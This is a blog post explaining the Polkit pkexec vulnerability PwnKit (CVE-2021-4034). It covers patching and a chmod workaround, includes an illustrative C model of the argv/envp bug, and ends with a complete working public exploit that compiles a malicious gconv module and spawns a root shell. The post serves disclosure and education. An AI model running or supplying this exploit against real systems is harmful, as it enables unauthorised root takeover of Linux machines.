New Linux Priv Esc – PwnKit (CVE-2021-4034)

A memory corruption vulnerability (CVE-2021-4034) in Polkit's pkexec, a component shipped by all major Linux distributions and by some Unix-like operating systems, has just been disclosed and can be easily exploited by any unprivileged local user to gain full root privileges.

This vulnerability is really interesting given how easy it is to exploit. Moreover, it has been exploitable since pkexec was first added to Polkit in May 2009. For more than 12 years we have been exposed to this memory corruption without realising it. How many other vulnerabilities that we are not aware of are yet to be discovered?

In this post I will explain how this vulnerability works and show you a Proof of Concept to see how to exploit it.

Polkit

Polkit (formerly PolicyKit) is a framework, present on most Linux systems, that lets unprivileged processes request actions from privileged ones under a configurable policy. Its pkexec command is a SUID-root binary that runs a command as another user (root by default) after checking that policy.

CVE-2021-4034 - PwnKit

One of the striking things about this vulnerability is how easy it is to exploit: although the Qualys researchers who found it did not publish their exploit, within a few hours several people had published working exploits of their own.

Interestingly, although it is a memory corruption vulnerability, it can be exploited instantly and reliably, with no brute forcing, and independently of the processor architecture. Furthermore, the polkit daemon (polkitd) does not need to be running in order to exploit it; only the SUID-root pkexec binary is involved.

It is a local vulnerability, so the attacker needs an existing foothold on the victim machine (any unprivileged account is enough), but from there it gives immediate privilege escalation to root.

Solution

Patches have already been released, so updating the polkit package from your distribution is sufficient to close the vulnerability.

If updating is not possible, the workaround is to remove the SUID bit from pkexec so that it no longer runs as root (this also disables its normal function until the patched package is installed):

chmod 0755 /usr/bin/pkexec

PwnKit - Proof of Concept

Let’s start by outlining the technical details of the exploit.

Normally, "unsecure" environment variables such as LD_PRELOAD are stripped from the environment of SUID programs (programs that run with the privileges of the file owner rather than of the caller). The dynamic linker (ld.so, also installed as ld-linux.so) does this when the kernel flags the new process as running in secure-execution mode, before the program's main function is executed.

The vulnerability is an out-of-bounds read and write on pkexec's argv array: when pkexec is executed with an empty argument list (argc == 0), it reads argv[1], which is actually envp[0], and later writes the resolved program path back into that same slot. This allows re-introducing into pkexec's environment an unsecure variable that the dynamic linker had removed, such as LD_PRELOAD (a list of shared objects the dynamic linker loads before any other library). Since LD_PRELOAD is only consulted when the program starts, the published exploits use GCONV_PATH instead, which glibc reads later on, when pkexec prints an error message and the iconv character-set conversion module for the requested charset is loaded.

If you want a more technical explanation, you can find it in the advisory note published by Qualys.
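To make that argv/envp aliasing concrete, the following model is added here as an illustration; it is not pkexec's source and not part of any published exploit. It lays out argv and envp the way execve() does for an empty argument list, runs a simplified copy of pkexec's program-name resolution over that layout, and shows the lookup rewriting envp[0] into a GCONV_PATH assignment, next to the patched variant that refuses argc < 1. The find_program_in_path helper is a hypothetical stand-in for GLib's g_find_program_in_path() that only builds the path string, and the stack layout and environment strings are constructed inputs.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Model of the pkexec argument handling (not pkexec's own code).
 *
 * execve() lays argv[] and envp[] out back to back on the new process's
 * stack: argv[argc] is the NULL terminator and envp[0] comes right after it.
 * When a process is started with an empty argument list (argc == 0),
 * argv[1] is therefore the same memory slot as envp[0].
 */

/* Hypothetical stand-in for GLib's g_find_program_in_path(): joins the
 * first directory listed in PATH with the program name. The real function
 * also checks that the file exists and is executable; the exploit satisfies
 * that by creating an executable file at GCONV_PATH=./pwnkit. */
static char *find_program_in_path(const char *name, const char *path_env)
{
    size_t dirlen = strcspn(path_env, ":");
    char *out = malloc(dirlen + 1 + strlen(name) + 1);
    if (out == NULL)
        return NULL;
    memcpy(out, path_env, dirlen);
    out[dirlen] = '/';
    strcpy(out + dirlen + 1, name);
    return out;
}

/* The vulnerable logic: the loop skips option arguments starting at n = 1,
 * and afterwards argv[n] is used even if n == argc (loop never entered).
 * Returns the resolved program path, or NULL. */
static char *vulnerable_resolve(int argc, char **argv, const char *path_env)
{
    int n;
    for (n = 1; n < argc; n++) {
        if (argv[n][0] != '-')          /* first non-option argument */
            break;
    }
    char *path = argv[n];               /* argc == 0: out-of-bounds read of envp[0] */
    if (path == NULL)
        return NULL;
    if (path[0] != '/') {
        char *s = find_program_in_path(path, path_env);
        if (s == NULL)
            return NULL;
        argv[n] = s;                    /* argc == 0: out-of-bounds write into envp[0] */
        path = s;
    }
    return path;
}

/* The patched logic adds the missing bounds check before anything else. */
static char *fixed_resolve(int argc, char **argv, const char *path_env)
{
    if (argc < 1)
        return NULL;                    /* real pkexec exits with status 127 here */
    return vulnerable_resolve(argc, argv, path_env);
}

/* Constructed stack layout for execve("/usr/bin/pkexec", {NULL}, env) with
 * the exploit's environment. Runs one resolver over it and returns the
 * string envp[0] points to afterwards (the resolved path is intentionally
 * not freed, because envp[0] may now point to it). */
static const char *simulate_empty_argv(char *(*resolve)(int, char **, const char *))
{
    static char *stack[4];
    stack[0] = NULL;                    /* argv[0] == argv[argc]: the NULL terminator */
    stack[1] = "pwnkit";                /* envp[0]: a bare name, no '=' */
    stack[2] = "PATH=GCONV_PATH=.";     /* envp[1] */
    stack[3] = NULL;
    char **argv = stack;
    char **envp = stack + 1;
    resolve(0, argv, envp[1] + strlen("PATH="));
    return envp[0];
}

/* The same resolver on a normal invocation such as "pkexec id", for comparison. */
static char *simulate_normal(char *(*resolve)(int, char **, const char *), const char *prog)
{
    char *argv[3];
    argv[0] = "pkexec";
    argv[1] = (char *)prog;
    argv[2] = NULL;
    return resolve(2, argv, "/usr/bin:/bin");
}

int main(void)
{
    printf("vulnerable, argc == 0: envp[0] = \"%s\"\n", simulate_empty_argv(vulnerable_resolve));
    printf("fixed,      argc == 0: envp[0] = \"%s\"\n", simulate_empty_argv(fixed_resolve));
    printf("vulnerable, pkexec id: path    = \"%s\"\n", simulate_normal(vulnerable_resolve, "id"));
    return 0;
}
```

With the vulnerable resolver, envp[0] changes from "pwnkit" to "GCONV_PATH=./pwnkit", which is exactly the variable the real exploit needs glibc to see; with the patched resolver the environment is left untouched, and a normal "pkexec id" still resolves to /usr/bin/id through the same code path.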

The exploit uses this to point the injected variable at a directory containing a malicious shared object that pkexec then loads and executes as root, which gives us a shell with root access to the entire operating system:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Source of the shared object that glibc's iconv will load as a "gconv module".
 * gconv_init() runs inside the SUID-root pkexec process, so it can set uid/gid to 0
 * and spawn a shell; it also removes the files the exploit created. */
char *shell =
"#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n\n"
"void gconv() {}\n"
"void gconv_init() {\n"
" setuid(0); setgid(0);\n"
" seteuid(0); setegid(0);\n"
" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
" exit(0);\n"
"}";

int main(int argc, char *argv[]) {
    FILE *fp;
    /* A directory named "GCONV_PATH=." with an executable "pwnkit" inside: pkexec's
     * program lookup resolves "pwnkit" to "GCONV_PATH=./pwnkit", and that string,
     * written over envp[0], becomes the environment variable GCONV_PATH=./pwnkit */
    system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
    /* The gconv-modules file maps the charset PWNKIT to the module pwnkit.so in this directory */
    system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
    fp = fopen("pwnkit/pwnkit.c", "w");
    if (fp == NULL) { perror("fopen"); return 1; }
    fprintf(fp, "%s", shell);
    fclose(fp);
    system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
    /* Run pkexec with an empty argv, so that argv[1] is envp[0] ("pwnkit").
     * PATH makes the lookup land in the GCONV_PATH=. directory, CHARSET=PWNKIT selects
     * the malicious module, and SHELL=pwnkit (not listed in /etc/shells) triggers the
     * error message whose charset conversion loads it. */
    char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
    execve("/usr/bin/pkexec", (char*[]){NULL}, env);
    perror("execve");   /* only reached if pkexec could not be executed */
    return 1;
}

The exploit code I have shown is by Andris Raugulis and you can find it here; there are others, such as the one by Blasty, which you can find here.

Below is the demonstration of the Proof of Concept; just compile and run the file:

And that's it! I hope you enjoyed this post. As you can see, the PwnKit vulnerability is easily exploitable and affects most Linux distributions. A few months ago another Polkit vulnerability came out, CVE-2021-3560, an authentication bypass in the polkit daemon that also allowed local privilege escalation and that had been sitting in the code of several distributions for about seven years, ready to be exploited. How many more will remain to be discovered?

Lethani.